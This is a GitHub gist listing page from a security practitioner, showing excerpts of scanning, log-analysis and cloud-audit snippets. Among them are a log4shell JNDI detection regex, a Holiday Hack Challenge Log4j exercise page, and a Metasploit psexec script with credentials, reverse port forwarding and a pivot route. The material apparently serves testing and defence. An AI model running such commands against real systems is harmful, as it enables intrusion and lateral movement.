Skip to content

Instantly share code, notes, and snippets.

Avatar

Joshua Wright joswr1ght

View GitHub Profile
@joswr1ght
joswr1ght / nmap-top-tcpport-commadsep-list.sh
Created Jul 24, 2022
Create a list of top Nmap TCP ports, converted to comma-separated format
View nmap-top-tcpport-commadsep-list.sh
grep -v '^#' /usr/local/Cellar/nmap/7.92/share/nmap/nmap-services | grep '/tcp' | sort -r -k3 | awk '{print $2}' | sed 's,/tcp,,' | head -40 | sort -n | gsed -z 's/\n/,/g;s/,$/\n/'
View mlatitlecase.py
#!/usr/bin/env python3
# MLA Style: Capitalization
#
# ref: https://libguides.pvcc.edu/citationstyles/mla9-capitalization
#
# In a title or a subtitle, capitalize the first word, the last word, and all
# principal words, including those that follow hyphens in compound terms.
# Therefore, capitalize the following parts of speech:
#
# Nouns (e.g., flowers, as in The Flowers of Europe)
@joswr1ght
joswr1ght / extract-nessus-report-data.py
Created Apr 14, 2022
Read Nessus CSV report, extract records of interest
View extract-nessus-report-data.py
#!/usr/bin/env python3
import csv
import sys
import os
if (len(sys.argv) == 1):
sys.stderr.write(
f"Usage: {os.path.basename(sys.argv[0])} <nessus-csv-file>\n")
sys.exit(1)
@joswr1ght
joswr1ght / test_badattributes.py
Created Mar 18, 2022
Test one or more Asciidoc .adoc files for missing document attribute definitions
View test_badattributes.py
#!/usr/bin/env python3
# Using one or more adoc files, build a list of all document attributes,
# then search for typo'd or undefined references to the attributes.
#
# 2022-03-18
# Copyright (c) 2022 Joshua Wright <jwright@hasborg.com>
# LICENSE: GPL 3.0
import sys
import os
@joswr1ght
joswr1ght / mifare-desfire-aid-mapping.md
Last active Feb 24, 2022
MIFARE DESFire AID Mapping
View mifare-desfire-aid-mapping.md

MIFARE DESFire AID Mapping

Entered here for prosperity and so I don't have to search for this ever again.

The MIFARE DESFire Application Identifier (AID) is a 3-byte value that represents the application ID used for RFID functionality that holds files. This can be a MIFARE Classic AID structure (2 bytes) adapted for use with the expanded MIFARE DESFire AID (3 bytes).

https://www.nxp.com/docs/en/application-note/AN10787.pdf

A 2-byte MIFARE Classic AID adapted to MIFARE DESFire uses a leading nibble of 0xf and a trailing nibble of 0x0 - 0xf. The middle 2 bytes are the MIFARE Classic AID. ex., 0x7009 is the Timelox AB MIFARE Classic AID; 0xf7009x is the adapted AID for MIFARE DESFire.

@joswr1ght
joswr1ght / logshell-search.sh
Created Dec 20, 2021
Search for log4shell attack patterns
View logshell-search.sh
#!/bin/sh
# Specify a starting directory as the first command-line argument to search for
# log4shell-style attack patterns.
grep -E -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' $1
@joswr1ght
joswr1ght / HELP.md
Last active Jan 5, 2022
Log4Jack Bonus Help
View HELP.md

Yule Log4Jack Help

Hi, Josh Wright here. I'm the technical director for the Holiday Hack Challenge. We don't normally break the 4th wall like this, but we think this Log4j vulnerability calls for special measures to give you the information you need to assess, identify, and mitigate this vulnerability.

In this challenge, Icky McGoop asks for your help in exploiting a Java Solr server at http://solrpower.kringlecastle.com:8983. This server is vulnerable to the Log4shell vulnerability. Your goal is to exploit the server and get a

@joswr1ght
joswr1ght / ctsummarize.sh
Created Nov 10, 2021
ctsummarize: Create Multiple Output Files From CloudTrail Activity for Analysis
View ctsummarize.sh
#!/bin/bash
REQUIREDUTILS="jq zcat mktemp sort uniq rm"
# Run program and test exit status to ensure success
function runtst {
"$@"
local status=$?
if (( status != 0 )); then
echo "error running command" >&2
@joswr1ght
joswr1ght / youwillnotbestmejq.sh
Last active Jul 29, 2021
Get Name and IP address from EC2 instances
View youwillnotbestmejq.sh
$ aws --profile falsimentis --region us-west-1 ec2 describe-instances | jq -jr '.Reservations[] | .Instances[] | "\"", (.PublicIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
"54.183.200.32":"Web Server 3",
"13.56.160.248":"VPC NAT Backup",
"13.57.148.101":"VPC NAT",
"54.153.36.229":"Dev Webserver",
"52.52.159.114":"Web Server 2",
"null":"DB Server 1",
"54.241.78.206":"Web Server 1",
"54.219.245.27":"Web Server 4",
$ cat ec2-describe-instances.json | jq -jr '.Reservations[] | .Instances[] | "\"", (.NetworkInterfaces[] | .PrivateIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"'
@joswr1ght
joswr1ght / intermediate-forwarder.met
Created May 21, 2021
Setup Intermediate Forwarder for Metasploit Callback
View intermediate-forwarder.met
use exploit/windows/smb/psexec
set RHOST 10.10.10.10
set SMBUSER falken
set SMBPASS joshua
set LHOST tap0
show options
exploit
portfwd add -R -L 127.0.0.1 -l 4444 -p 4444
bg
route add 10.10.10.20/32 1